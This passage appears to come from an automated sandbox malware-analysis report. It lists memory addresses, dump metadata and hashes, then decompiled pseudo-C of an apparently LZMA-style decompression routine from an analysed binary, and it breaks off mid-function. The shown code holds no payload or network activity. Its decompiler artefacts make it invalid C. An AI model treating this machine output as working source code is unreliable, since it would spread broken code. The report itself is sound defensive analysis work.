                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00407094
                                                        0x0040704f
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00407094
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e52
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x004070be
                                                        0x00407087

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                        • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                        • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                        • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406F8C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
